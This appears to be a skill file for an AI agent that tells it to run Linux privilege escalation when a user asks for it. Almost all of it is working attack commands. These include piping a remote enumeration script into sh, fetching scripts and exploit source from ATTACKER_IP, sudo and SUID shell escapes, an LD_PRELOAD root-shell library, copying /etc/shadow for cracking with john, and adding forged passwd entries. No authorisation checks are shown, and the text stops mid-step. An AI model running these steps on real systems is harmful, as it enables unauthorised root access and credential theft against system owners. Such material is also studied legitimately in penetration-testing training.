"This skill should be used when the user asks to "escalate privileges on Linux", "find privesc vectors on Linux systems", "exploit sudo misconfigurations", "abuse SUID binaries", "ex..."
Execute systematic privilege escalation assessments on Linux systems to identify and exploit misconfigurations, vulnerable services, and security weaknesses that allow elevation from low-privilege user access to root-level control. This skill enables comprehensive enumeration and exploitation of kernel vulnerabilities, sudo misconfigurations, SUID binaries, cron jobs, capabilities, PATH hijacking, and NFS weaknesses.
Gather fundamental system details for vulnerability research:
# Hostname and system role
hostname
# Kernel version and architecture
uname -a
# Detailed kernel information
cat /proc/version
# Operating system details
cat /etc/issue
cat /etc/*-release
# Architecture
arch
# Current user context
whoami
id
# Users with login shells
cat /etc/passwd | grep -v nologin | grep -v false
# Users with home directories
cat /etc/passwd | grep home
# Group memberships
groups
# Other logged-in users
w
who
# Network interfaces
ifconfig
ip addr
# Routing table
ip route
# Active connections
netstat -antup
ss -tulpn
# Listening services
netstat -l
# All running processes
ps aux
ps -ef
# Process tree view
ps axjf
# Services running as root
ps aux | grep root
# Full environment
env
# PATH variable (for hijacking)
echo $PATH
Deploy automated scripts for comprehensive enumeration:
# LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# LinEnum
./LinEnum.sh -t
# Linux Smart Enumeration
./lse.sh -l 1
# Linux Exploit Suggester
./les.sh
Transfer scripts to target system:
# On attacker machine
python3 -m http.server 8000
# On target machine
wget http://ATTACKER_IP:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
uname -r
cat /proc/version
# Use Linux Exploit Suggester
./linux-exploit-suggester.sh
# Manual search on exploit-db
searchsploit linux kernel [version]
| Kernel Version | Exploit | CVE |
|---|---|---|
| 2.6.x - 3.x | Dirty COW | CVE-2016-5195 |
| 4.4.x - 4.13.x | Double Fetch | CVE-2017-16995 |
| 5.8+ | Dirty Pipe | CVE-2022-0847 |
# Transfer exploit source
wget http://ATTACKER_IP/exploit.c
# Compile on target
gcc exploit.c -o exploit
# Execute
./exploit
sudo -l
Reference https://gtfobins.github.io for exploitation commands:
# Example: vim with sudo
sudo vim -c ':!/bin/bash'
# Example: find with sudo
sudo find . -exec /bin/sh \; -quit
# Example: awk with sudo
sudo awk 'BEGIN {system("/bin/bash")}'
# Example: python with sudo
sudo python -c 'import os; os.system("/bin/bash")'
# Example: less with sudo
sudo less /etc/passwd
!/bin/bash
When env_keep includes LD_PRELOAD:
// shell.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}
# Compile shared library
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
# Execute with sudo
sudo LD_PRELOAD=/tmp/shell.so find
find / -type f -perm -04000 -ls 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
Reference GTFOBins for SUID exploitation:
# Example: base64 for file reading
LFILE=/etc/shadow
base64 "$LFILE" | base64 -d
# Example: cp for file writing
cp /bin/bash /tmp/bash
chmod +s /tmp/bash
/tmp/bash -p
# Example: find with SUID
find . -exec /bin/sh -p \; -quit
# Read shadow file (if base64 has SUID)
base64 /etc/shadow | base64 -d > shadow.txt
base64 /etc/passwd | base64 -d > passwd.txt
# On attacker machine
unshadow passwd.txt shadow.txt > hashes.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
# Generate password hash
openssl passwd -1 -salt new newpassword
# Add to /etc/passwd (using SUID editor)